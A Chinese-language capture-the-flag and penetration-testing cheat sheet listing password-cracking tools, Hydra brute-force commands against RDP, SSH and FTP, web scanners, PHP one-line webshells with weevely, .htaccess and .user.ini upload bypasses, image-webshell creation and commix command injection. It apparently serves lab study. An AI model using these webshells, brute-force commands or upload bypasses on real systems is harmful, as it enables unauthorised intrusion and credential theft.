杂项MISC
unshadow命令
基本上会结合/etc/passwd的数据和/etc/shadow的数据,创建1个含有用户名和密码详细信息的文件。
unshadown /etc/passwd /etc/shadow > 1.txt
加解密插件
Base64的使用
1.base64 <file> -----------base64加密
2.base -d -i <file>--------- base64解密 -i去除无用字符
密码爆破
Crunch
4.crunch 4 4 0123456789 > <file>-------- 生成一个最小长度为4和最大长度为4的0~9的四位数密码本
Hashcat
hashcat -a 0 "md5值" –force
john
john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。
上图是John爆破hash
John <file>
- 破解的用户密码稍微高级一些,比如根据用户名来设置密码,我们就需要John -Single 这个命令,原理是根据用户的名称,加上常见的变化而猜测密码。比如此用户叫test,而他的密码是test123、test1、tset、test123、...。
John passwd.txt -single
- 当用户的密码设置的十分困难时,我们就需要一个字典文件来进行破解,这时我们可以使用John -w –rules :使用字典文件来进行解密,如人们常用hello、admin、password、superman、cooler、asdfgh、 123456等作为自己的密码。而-rules参数则在此基础上再加上些变化,如字典中有单词test,则john还会尝试使用tes、teSt、 tset等单词变化进行解密。
John -w:b.txt passwd.txt -rules
rar2john
rar2john 1.rar ----获取1.rar的md5值,之后配合hashcat使用。
zip2john
使用John破解zip文件
zip2john flag.zip >> password.txt 用zip2john爆破flag.zip的hash文件
john password.txt 使用John命令,计算hash文件
zip2john 1.zip ----获取1.zip的md5值,之后配合hashcat使用。
7z2john
7z2john 1.7z ----获取7z的md5值,之后配合hashcat使用。
Binwalk
binwalk -e <file>------------ 分离文件
Exiftool
exiftool <file> ---------查看exif类型文件详细信息
Hydra的使用
Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 rdp----远程桌面爆破
Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 ssh ----ssh协议爆破
Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 ftp ----ftp协议爆破
扫描插件
注意:在kali中有默认的密码本,在/usr/share/wordlists目录下。
1.dirb使用
1.使用/usr/share/wordlists/dirb/big.txt 字典来扫描Web服务
dirb https://www.baidu.com /usr/share/wordlists/dirb/big.txt -----dirb接url再接密码本的绝对路径
dirb <url> <file>
- 将扫描结果保存到文件中
dirb https://www.baidu.com/ -o output.txt /usr/share/wordlists/dirb/big.txt
- 列举指定后缀名目录
dirb https://www.baidu.com -X .php /usr/share/wordlists/dirb/big.txt
- 添加毫秒延迟,避免洪水攻击
dirb http://www.baidu.com/ -z 100
2.whatweb使用
1.whatweb <url> --------扫描网站
2.whatweb 192.168.126.0/24-------扫描网段
3.whatweb <url> -c='<cookie>'------指定cookie
3.wpscan的使用
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。
wpscan --url "https://**********"
文件上传
weevely使用
<?php @eval($_GET['cmd']);?>
<?php @eval($_POST['cmd']);?>
<?php system($_GET['ls']);?>
创建一句话木马。
命令:weevely generate cmd /root/m.php
cmd是密码
/root/m.php是路径
连接weevely木马。(上传完后操作)
命令:weevely http://172.16.1.105/hackable/uploads/m.php cmd
http://172.16.1.105/hackable/upload/m.php是该木马文件在对方靶机里的路径
cmd 是密码,连接时一定要加上密码,千万不能忘记,否则会出问题。
出现weevely> 即为木马连接成功。
.htaccess
.htaccess ⽂件定义了 Apache 的解析规则,若存在以下⽂件,其内容会被 PHP script 解析
1 AddType application/x-httpd-php .png
2 AddType application/x-httpd-php .jpg
3 AddType application/x-httpd-php .html
4 AddType application/x-httpd-php .txt
5 ...
.user.ini
- auto_prepend_file = test.png --------红色部分就是你上传的木马文件名
一句话木马
注:最好会php语言,不会就死记硬背
<?php @eval($_GET[‘cmd’]);?>
<?php @eval($_POST[‘cmd’]);?>
<?php system($_GET[‘ls’]);?>
<?php system($POST[ls]);?>
图片马
以管理员权限打开Windows命令行,切换到桌面目录
Copy 666.png/b + cmd.txt/a 888.png 就会复制一个新的888.png文件
数据库攻击
命令 / 代码注⼊ - commix
commix ⼯具遵循了 SQLmap 的命令格式,使⽤起来也⽐较⽅便
Get
commix -r https://www.example.com/index.php?code=1 --level 3-----红色部分表示url,绿色部分表示注入点。
POST
commix -r /home/leadlife/test/codeinj.txt --level 3 –-----红色部分表示post信息保存的文件的绝对路径。
爬取可控参数并⾃动测试代码 / 命令注⼊
commix -u http://10.1.128/pikachu/ --crawl 3 --level 3
提权攻击
Find提权
Getcap提权
Which提权
Vmdk文件解压
Linux中
7z x flag.vmdk -o./